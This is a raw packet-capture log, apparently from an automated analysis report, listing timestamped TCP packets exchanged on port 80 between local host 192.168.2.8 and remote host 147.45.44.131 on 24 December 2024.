                                                          Dec 24, 2024 02:18:16.605973959 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.610364914 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.610575914 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.610639095 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.615031004 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.615242958 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.615303993 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.619692087 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.619884968 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.619935989 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.621664047 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.621872902 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.621989965 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.623986006 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.624311924 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.624520063 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.624619007 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.629004955 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.629220963 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.629524946 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.630074024 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.630153894 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.630235910 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.632421017 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.632483959 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.632607937 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.633665085 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.633853912 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.633909941 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.637099028 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.637232065 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.637767076 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.638346910 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.638539076 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.638586044 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.641794920 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.641891003 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.641973972 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.643001080 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.643191099 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.643289089 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.646452904 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.646509886 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.646651030 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.647609949 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.651118994 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.651180983 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.651305914 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.655826092 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.655875921 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.656013012 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.660480976 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.660530090 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.660692930 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.665172100 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.665376902 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.665429115 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.669845104 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.669898033 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.670145035 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.674544096 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.674591064 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.674683094 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.679155111 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.679199934 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.679326057 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.683815002 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.683907032 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.683999062 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.688504934 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.688559055 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.688738108 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.693154097 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.693203926 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.693372011 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.697824001 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.697882891 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.698136091 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.702516079 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.702564955 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.702722073 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.707195044 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.707364082 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.707406044 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.711905003 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.711961985 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.712094069 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.716614008 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.716679096 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.716783047 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.721293926 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.721389055 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.721693039 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.725936890 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.725996017 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.726094961 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.730593920 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.730652094 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.730782032 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.741445065 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.741520882 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.742388010 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.742448092 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.742630005 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.744386911 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.744436026 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.744582891 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.748388052 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.748437881 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.748569012 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.752358913 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.752408028 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.752549887 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.756124973 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.756180048 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.756331921 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.759963036 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.760024071 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.760164022 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.763703108 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.763757944 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.763874054 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.767287970 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.767339945 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.767476082 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.770860910 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.770929098 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.770973921 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.774214029 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.774281979 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.774404049 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.777746916 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.777821064 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.778083086 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.781193972 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.781219006 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.781250000 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.784446955 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.784682035 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.784751892 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.787884951 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.787940979 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.788098097 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.791337013 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.791402102 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.791532993 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.794744968 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.794791937 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.794934988 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.798155069 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.798221111 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.798357964 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.801616907 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.801719904 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.801780939 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.805020094 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.805131912 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.805211067 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.808442116 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.808479071 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.808635950 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.811870098 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.811955929 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.812077045 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.813760996 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.813971996 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.814023018 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.815416098 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.815612078 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.815638065 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.816014051 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.816382885 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.816435099 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.818716049 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.818921089 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.818965912 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.822130919 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.822273970 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.822343111 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.822784901 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.822798014 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.822860003 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.824235916 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.824431896 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.824503899 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.825546980 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.825592041 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.825751066 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.828131914 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.828324080 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.828371048 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.828939915 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.829015970 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.829161882 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.832042933 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.832250118 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.832365990 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.832642078 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.832679987 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.833040953 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.835853100 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.835905075 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.836092949 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.836106062 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.836846113 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.836957932 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.839246035 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.839407921 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.839442968 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.839845896 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.840255022 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.840306997 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.842688084 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.842725039 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.842914104 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.843350887 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.843708992 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.843832970 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.846092939 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.846147060 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.846318007 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.847029924 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.847224951 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.847385883 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.849534035 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.849587917 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.849762917 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.850651026 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.850838900 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.851063967 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.852977991 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.853024006 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.853207111 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.854110003 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.854322910 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.854523897 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.856405973 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.856463909 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.856590033 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.857530117 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.857726097 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.857780933 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.859803915 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.859847069 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.860004902 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.860843897 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.861033916 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.861088991 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.863280058 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.863531113 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.863570929 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.864197016 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.864439011 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.864490986 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.866681099 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.866847038 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.866925001 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.867491961 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.867716074 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.867777109 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.870105982 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.870157957 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.870315075 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.870867014 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.871088982 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.871148109 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.872631073 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.872855902 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.872905016 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.873549938 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.873615980 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.873763084 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.874337912 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.874552011 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.874608040 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.876085043 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.876316071 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.876380920 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.876955986 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.877002954 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.877115965 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.877861023 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.878056049 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.878109932 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.879559040 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.879766941 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.879806042 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.881319046 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.881519079 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.881563902 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.883054018 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.883270025 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.883306980 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.884804964 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.885030031 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.885066986 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.886565924 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.886715889 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.886766911 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.931725025 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.931833982 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.931899071 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.933072090 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.933150053 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.933269978 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.935847998 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.935908079 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.936068058 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.938702106 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.938759089 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.938864946 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.941553116 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.941606998 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.941694021 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.944227934 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.944274902 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.944397926 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.946871042 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.946929932 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.947051048 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.947876930 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.948079109 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.948148966 CET4970780192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.948710918 CET8049707147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.949476957 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.949536085 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.949687004 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.952068090 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.952128887 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.952259064 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.954654932 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.954704046 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.954832077 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.957155943 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.957207918 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.957348108 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.959633112 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.959687948 CET4970680192.168.2.8147.45.44.131
                                                          Dec 24, 2024 02:18:16.959821939 CET8049706147.45.44.131192.168.2.8
                                                          Dec 24, 2024 02:18:16.962188959 CET8049706147.45.44.131192.168.2.8
